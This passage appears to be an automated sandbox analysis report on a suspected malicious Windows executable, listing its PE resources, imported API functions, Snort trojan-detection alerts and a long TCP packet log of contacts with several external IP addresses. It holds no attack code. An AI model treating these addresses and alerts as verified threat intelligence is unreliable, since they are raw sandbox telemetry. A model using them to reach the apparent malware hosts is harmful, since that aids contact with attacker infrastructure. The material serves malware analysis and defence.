RT_ICON	0x401b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tatar	Russia	0.5820539419087137
RT_ICON	0x42758	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tatar	Russia	0.6418855534709194
RT_ICON	0x43800	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tatar	Russia	0.7323770491803279
RT_ICON	0x44188	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tatar	Russia	0.7881205673758865
RT_ICON	0x44668	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.4680170575692964
RT_ICON	0x45510	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.6385379061371841
RT_ICON	0x45db8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tatar	Russia	0.7137096774193549
RT_ICON	0x46480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tatar	Russia	0.7796242774566474
RT_ICON	0x469e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tatar	Russia	0.6439834024896266
RT_ICON	0x48f90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tatar	Russia	0.7614754098360655
RT_ICON	0x49918	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tatar	Russia	0.849290780141844
RT_ICON	0x49de8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tatar	Russia	0.4261727078891258
RT_ICON	0x4ac90	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tatar	Russia	0.5388086642599278
RT_ICON	0x4b538	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tatar	Russia	0.5691244239631337
RT_ICON	0x4bc00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tatar	Russia	0.6148843930635838
RT_ICON	0x4c168	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tatar	Russia	0.5103734439834025
RT_ICON	0x4e710	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tatar	Russia	0.5905253283302064
RT_ICON	0x4f7b8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tatar	Russia	0.6213114754098361
RT_ICON	0x50140	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tatar	Russia	0.6640070921985816
RT_ICON	0x50620	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.4005863539445629
RT_ICON	0x514c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.5798736462093863
RT_ICON	0x51d70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tatar	Russia	0.6238479262672811
RT_ICON	0x52438	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tatar	Russia	0.6423410404624278
RT_ICON	0x529a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tatar	Russia	0.6716804979253111
RT_ICON	0x54f48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tatar	Russia	0.7183395872420263
RT_ICON	0x55ff0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tatar	Russia	0.7319672131147541
RT_ICON	0x56978	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tatar	Russia	0.7792553191489362
RT_DIALOG	0x59558	0x96	data	Tatar	Russia	0.7533333333333333
RT_STRING	0x595f0	0x2c4	data	Tatar	Russia	0.4830508474576271
RT_STRING	0x598b8	0x370	data	Tatar	Russia	0.4625
RT_STRING	0x59c28	0x30e	data	Tatar	Russia	0.4961636828644501
RT_STRING	0x59f38	0x56e	data	Tatar	Russia	0.4510791366906475
RT_STRING	0x5a4a8	0x61e	data	Tatar	Russia	0.4425287356321839
RT_STRING	0x5aac8	0x45a	data	Tatar	Russia	0.4605026929982047
RT_STRING	0x5af28	0xd0	data	Tatar	Russia	0.5480769230769231
RT_STRING	0x5aff8	0x4c6	data	Tatar	Russia	0.4541734860883797
RT_STRING	0x5b4c0	0xf0	data	Tatar	Russia	0.55
RT_STRING	0x5b5b0	0x69e	data	Tatar	Russia	0.43211334120425027
RT_STRING	0x5bc50	0x55a	data	Tatar	Russia	0.44233576642335765
RT_STRING	0x5c1b0	0x3ba	AmigaOS bitmap font "e", fc_YSize 29952, 22528 elements, 2nd "a", 3rd "n"	Tatar	Russia	0.46540880503144655
RT_STRING	0x5c570	0x2ae	data	Tatar	Russia	0.4606413994169096
RT_ACCELERATOR	0x57a50	0x38	data	Tatar	Russia	0.9107142857142857
RT_GROUP_CURSOR	0x57be8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Tatar	Russia	1.3
RT_GROUP_CURSOR	0x59350	0x22	data	Tatar	Russia	1.0294117647058822
RT_GROUP_ICON	0x3de18	0x14	data	Tatar	Russia	1.1
RT_GROUP_ICON	0x445f0	0x76	data	Tatar	Russia	0.6694915254237288
RT_GROUP_ICON	0x49d80	0x68	data	Tatar	Russia	0.7019230769230769
RT_GROUP_ICON	0x505a8	0x76	data	Tatar	Russia	0.6694915254237288
RT_GROUP_ICON	0x56de0	0x76	data	Tatar	Russia	0.6779661016949152
RT_VERSION	0x59378	0x1dc	data	Tatar	Russia	0.5819327731092437
None	0x57a88	0xa	data	Tatar	Russia	1.8

Imports

DLL	Import
KERNEL32.dll	SetDefaultCommConfigW, CreateJobObjectW, SetHandleInformation, GetProfileStringW, SetTapeParameters, GetCompressedFileSizeW, CancelDeviceWakeupRequest, GetPriorityClass, GlobalAlloc, GetConsoleAliasExesLengthW, GetFileAttributesA, IsDBCSLeadByte, lstrcatA, ExitThread, SetConsoleTitleA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, LocalLock, DisableThreadLibraryCalls, MoveFileExW, LoadLibraryA, OpenWaitableTimerW, WritePrivateProfileStringA, SetConsoleDisplayMode, AddAtomW, DeviceIoControl, GetModuleFileNameA, SetConsoleCursorInfo, GetModuleHandleA, QueryMemoryResourceNotification, FreeEnvironmentStringsW, VirtualProtect, SetFileShortNameA, LocalSize, LocalFree, SetFileAttributesW, CopyFileExA, SetEnvironmentVariableA, CompareStringW, LoadResource, WriteConsoleOutputCharacterW, SetFilePointer, GetTempFileNameW, GetEnvironmentVariableW, GetAtomNameA, GetFullPathNameW, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, WriteFile, GetStdHandle, DeleteCriticalSection, FatalAppExitA, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, MultiByteToWideChar, CloseHandle, CreateFileA, HeapSize, GetLocaleInfoW, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, GetTimeZoneInformation, CompareStringA, RaiseException
USER32.dll	GetProcessDefaultLayout
ADVAPI32.dll	ReadEventLogA, IsValidSid, GetPrivateObjectSecurity, RegRestoreKeyW, PrivilegedServiceAuditAlarmA, GetServiceKeyNameA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tatar	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
34.94.245.237192.168.2.580497122037771 12/24/23-10:44:14.580335	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49712	34.94.245.237	192.168.2.5
34.143.166.163192.168.2.580497142037771 12/24/23-10:44:16.767254	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49714	34.143.166.163	192.168.2.5
104.198.2.251192.168.2.580497132037771 12/24/23-10:44:15.426503	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49713	104.198.2.251	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2023 10:44:14.058160067 CET	49712	80	192.168.2.5	34.94.245.237
Dec 24, 2023 10:44:14.318958998 CET	80	49712	34.94.245.237	192.168.2.5
Dec 24, 2023 10:44:14.319070101 CET	49712	80	192.168.2.5	34.94.245.237
Dec 24, 2023 10:44:14.319380999 CET	49712	80	192.168.2.5	34.94.245.237
Dec 24, 2023 10:44:14.319410086 CET	49712	80	192.168.2.5	34.94.245.237
Dec 24, 2023 10:44:14.580089092 CET	80	49712	34.94.245.237	192.168.2.5
Dec 24, 2023 10:44:14.580234051 CET	80	49712	34.94.245.237	192.168.2.5
Dec 24, 2023 10:44:14.580334902 CET	80	49712	34.94.245.237	192.168.2.5
Dec 24, 2023 10:44:14.580419064 CET	80	49712	34.94.245.237	192.168.2.5
Dec 24, 2023 10:44:14.580487013 CET	49712	80	192.168.2.5	34.94.245.237
Dec 24, 2023 10:44:14.593261957 CET	49712	80	192.168.2.5	34.94.245.237
Dec 24, 2023 10:44:14.886953115 CET	80	49712	34.94.245.237	192.168.2.5
Dec 24, 2023 10:44:14.888324022 CET	49713	80	192.168.2.5	104.198.2.251
Dec 24, 2023 10:44:15.157051086 CET	80	49713	104.198.2.251	192.168.2.5
Dec 24, 2023 10:44:15.157155037 CET	49713	80	192.168.2.5	104.198.2.251
Dec 24, 2023 10:44:15.157504082 CET	49713	80	192.168.2.5	104.198.2.251
Dec 24, 2023 10:44:15.157541037 CET	49713	80	192.168.2.5	104.198.2.251
Dec 24, 2023 10:44:15.426409960 CET	80	49713	104.198.2.251	192.168.2.5
Dec 24, 2023 10:44:15.426434994 CET	80	49713	104.198.2.251	192.168.2.5
Dec 24, 2023 10:44:15.426502943 CET	80	49713	104.198.2.251	192.168.2.5
Dec 24, 2023 10:44:15.426516056 CET	80	49713	104.198.2.251	192.168.2.5
Dec 24, 2023 10:44:15.426587105 CET	49713	80	192.168.2.5	104.198.2.251
Dec 24, 2023 10:44:15.426673889 CET	49713	80	192.168.2.5	104.198.2.251
Dec 24, 2023 10:44:15.604963064 CET	49714	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:15.695491076 CET	80	49713	104.198.2.251	192.168.2.5
Dec 24, 2023 10:44:16.185456991 CET	80	49714	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:16.185549974 CET	49714	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:16.186765909 CET	49714	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:16.186841011 CET	49714	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:16.767081022 CET	80	49714	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:16.767128944 CET	80	49714	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:16.767254114 CET	80	49714	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:16.767271042 CET	80	49714	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:16.767333984 CET	49714	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:16.768148899 CET	49714	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:16.981702089 CET	49715	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:17.348359108 CET	80	49714	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:17.560631990 CET	80	49715	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:17.560755014 CET	49715	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:17.560976028 CET	49715	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:17.561016083 CET	49715	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:18.139892101 CET	80	49715	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:18.139910936 CET	80	49715	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:18.139978886 CET	80	49715	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:18.140120983 CET	80	49715	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:18.140182972 CET	49715	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:18.142607927 CET	49715	80	192.168.2.5	34.143.166.163
Dec 24, 2023 10:44:18.271687031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.545623064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.545855045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.546083927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.546128988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.765006065 CET	80	49715	34.143.166.163	192.168.2.5
Dec 24, 2023 10:44:18.819946051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.820008039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838449955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838494062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838536024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838567019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.838613987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838664055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.838677883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838704109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838751078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.838778019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838845015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838896036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:18.838915110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838941097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:18.838987112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.112711906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112737894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112750053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112762928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112818956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112862110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112876892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.112946987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.112951994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.112979889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113034964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113045931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.113110065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113158941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113183975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.113214970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113261938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113280058 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.113298893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113356113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.113383055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113429070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113471031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113481998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.113521099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113550901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113581896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.113646030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.113697052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.386907101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.386930943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.386943102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387003899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387065887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387080908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387094021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387111902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387132883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387157917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387239933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387254000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387283087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387326956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387370110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387386084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387460947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387511015 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387526989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387681961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387741089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387744904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387797117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387835026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387872934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387903929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.387953043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.387960911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388010979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388025045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388056993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388115883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388144016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388166904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388197899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388237000 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388298988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388432026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388451099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388480902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388484001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388525963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388582945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388597965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388639927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388649940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388714075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388752937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388783932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.388811111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.388861895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.389044046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.389580011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.389633894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.389651060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.389698982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.389746904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.389770985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.389817953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.389863968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.661118031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661183119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661200047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661241055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.661268950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661283016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661381960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661407948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.661422014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.661444902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661571026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661623001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.661695004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661791086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661842108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.661915064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.661953926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662002087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662034035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662072897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662102938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662122011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662178993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662225008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662416935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662494898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662544966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662570000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662619114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662667036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662729979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662744045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662803888 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662825108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662838936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662875891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.662941933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.662970066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663018942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663075924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663178921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663192034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663227081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663256884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663307905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663386106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663427114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663479090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663502932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663547039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663584948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663594007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663630962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663681984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663719893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663754940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663805008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663850069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663902044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663921118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.663949013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.663978100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664020061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664031029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664151907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664201021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664212942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664237022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664299011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664356947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664418936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664472103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664552927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664621115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664659977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664670944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664731979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664743900 CET	80	49716	91.215.85.17	192.168.2.5
